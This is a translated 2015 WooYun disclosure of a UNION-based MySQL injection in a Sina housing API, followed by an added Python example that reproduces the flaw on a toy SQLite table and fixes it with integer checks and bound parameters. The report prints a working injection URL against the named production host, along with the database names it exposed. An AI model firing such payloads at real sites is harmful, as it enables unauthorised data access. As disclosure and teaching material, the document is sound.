Vulnerability Summary

Defect ID: wooyun-2015-095008

Title: Another Sina site with MySQL injection (UNION supported)

Vendor: Sina

Author: lijiejie

Submitted: 2015-02-01 13:58

Fixed: 2015-03-18 14:00

Disclosed: 2015-03-18 14:00

Type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability Details

Disclosure timeline:

2015-02-01: Details sent to the vendor, awaiting vendor handling
2015-02-02: Vendor confirmed; details disclosed to the vendor only
2015-02-12: Details disclosed to core white hats and domain experts
2015-02-22: Details disclosed to regular white hats
2015-03-04: Details disclosed to intern white hats
2015-03-18: Details disclosed to the public

Brief description:

Another Sina site with MySQL injection (UNION supported)

Details:

Injection point:

http://i.house.sina.com.cn:80/api/cities.php?act=get_city_by_province&callback=jQuery18204528277686331421_1422735366633&format=json&province=11 UNION ALL SELECT 1,user(),version(),4,5,6,7,8%23&_=1422735366958

The province parameter is injectable, and UNION-based injection works.

Proof of vulnerability:

[Screenshot: sina.com.cn.mysqli_2.png]


[*] i_house_sina_com_cn
[*] information_schema
[*] test
Database: i_house_sina_com_cn
[225 tables]

Remediation:

Filter the parameter.

Copyright notice: please credit lijiejie@WooYun when reposting.


Vulnerability Response

Vendor response:

Severity: Medium

Rank: 7

Confirmed: 2015-02-02 10:04

Vendor reply:

This is a third-party partner business; they have been notified to fix it. Thanks for supporting Sina security.

Latest status:

None yet
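As an added illustration (not part of the original report and not the site's code), the snippet below reproduces the bug class on a constructed SQLite table and puts the remediation beside it: reject any province value that is not an integer, then bind the value instead of splicing it into the query. The table layout, function names and the 3-column version of the payload are assumptions made for this example.

```python
import sqlite3

# Toy stand-in for the site's city lookup (constructed schema, not the real one):
# three columns, so the report's 8-column UNION payload is shortened to 3 columns.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE city (id INTEGER, name TEXT, province INTEGER)")
    db.executemany("INSERT INTO city VALUES (?, ?, ?)",
                   [(1, "Beijing", 11), (2, "Tianjin", 12), (3, "Shanghai", 31)])
    return db

def get_city_by_province_vulnerable(db, province):
    # The request parameter is spliced into the SQL text, which is what the
    # report's "province=11 UNION ALL SELECT ..." URL demonstrates.
    sql = "SELECT id, name, province FROM city WHERE province=%s" % province
    return db.execute(sql).fetchall()

def get_city_by_province_fixed(db, province):
    # Step 1 (the report's "filter the parameter"): province must be an integer;
    # anything else, including a UNION payload, is rejected with ValueError.
    province_id = int(province)
    # Step 2: bind the value instead of formatting it into the query, so the
    # database never parses it as SQL.
    sql = "SELECT id, name, province FROM city WHERE province=?"
    return db.execute(sql, (province_id,)).fetchall()

# Constructed 3-column analogue of the report's payload; sqlite_version()
# plays the role of MySQL's version().
PAYLOAD = "11 UNION ALL SELECT 1, sqlite_version(), 3"

def demo():
    """Return (rows leaked by the vulnerable handler, whether the fixed handler
    rejected the payload, rows the fixed handler returns for a legitimate value)."""
    db = make_db()
    leaked = get_city_by_province_vulnerable(db, PAYLOAD)
    try:
        get_city_by_province_fixed(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    legit = get_city_by_province_fixed(db, "11")
    return leaked, blocked, legit

if __name__ == "__main__":
    leaked, blocked, legit = demo()
    print("vulnerable handler returned:", leaked)
    print("fixed handler rejected payload:", blocked)
    print("fixed handler, province=11:", legit)
```

The vulnerable handler returns the Beijing row plus a second row carrying the database version string; the fixed handler raises ValueError on the payload and returns only the Beijing row for a legitimate value.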